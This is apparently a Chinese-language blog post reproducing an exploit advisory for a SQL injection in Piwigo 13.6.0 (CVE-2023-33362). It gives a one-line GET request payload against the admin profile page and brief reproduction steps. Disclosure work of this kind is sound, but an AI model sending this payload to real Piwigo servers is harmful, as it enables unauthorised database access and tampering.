Piwigo 13.6.0 SQL注入漏洞技术分析与利用

本文详细分析了Piwigo图片管理软件13.6.0版本中的一个SQL注入漏洞(CVE-2023-33362),包括漏洞的技术细节、利用方式以及复现步骤。文章提供了具体的攻击载荷和请求示例。

漏洞标题: Piwigo 13.6.0 - SQL注入

日期: 2025-11-25

漏洞作者: CodeSecLab

供应商主页: https://github.com/Piwigo/Piwigo

软件链接: https://github.com/Piwigo/Piwigo

版本: 13.6.0

测试平台: Windows

CVE编号: CVE-2023-33362

漏洞验证: 

1
2

GET /admin.php?page=profile&user_id=' OR 1=1 --  HTTP/1.1
Host: piwigo

复现步骤

  1. 以管理员身份登录。
  2. 发送上述请求。
  3. 观察结果。

标签

SQL注入、Web应用安全

公告/来源

链接

comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次